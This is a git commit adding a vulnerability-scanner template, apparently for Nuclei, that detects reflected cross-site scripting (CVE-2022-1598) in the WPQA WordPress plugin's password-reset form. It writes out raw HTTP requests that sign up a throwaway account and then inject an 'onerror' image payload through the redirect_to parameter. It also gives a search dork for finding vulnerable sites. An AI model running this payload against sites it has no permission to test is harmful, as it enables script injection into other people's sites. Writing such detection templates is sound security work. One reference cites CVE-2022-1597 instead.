Merge pull request #4419 from dwisiswant0/add/CVE-2022-1598

Add CVE-2022-1598
2022-05-17 17:52:32 +05:30 · 2022-05-17 17:52:32 +05:30 · a12f9d0a03
parent 90b06b4bc7 b701b3dfb5
commit a12f9d0a03
1 changed files with 58 additions and 0 deletions
--- a/cves/2022/CVE-2022-1598.yaml
+++ b/cves/2022/CVE-2022-1598.yaml
@ -0,0 +1,58 @@
+id: CVE-2022-1598
+
+info:
+  name: WPQA < 5.4 - Reflected Cross-Site Scripting
+  author: veshraj
+  severity: medium
+  description: |
+    The plugin, used as a companion for the Discy and Himer themes,
+    does not sanitise and escape a parameter on its reset password
+    form which makes it possible to perform reflected XSS.
+  reference:
+    - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
+  metadata:
+    verified: true
+    google-dork: inurl:/wp-content/plugins/wpqa
+  tags: xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa
+
+variables:
+  user: "{{to_lower(rand_base(5))}}"
+  pass: "{{user}}{{to_lower(rand_base(3))}}"
+  redirect_to: '"><img src=x onerror=alert(document.domain)>'
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+        Content-Type: application/x-www-form-urlencoded
+
+        user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+        Content-Type: application/x-www-form-urlencoded
+
+        user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{redirect_to}}'
+          - '"success":1'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200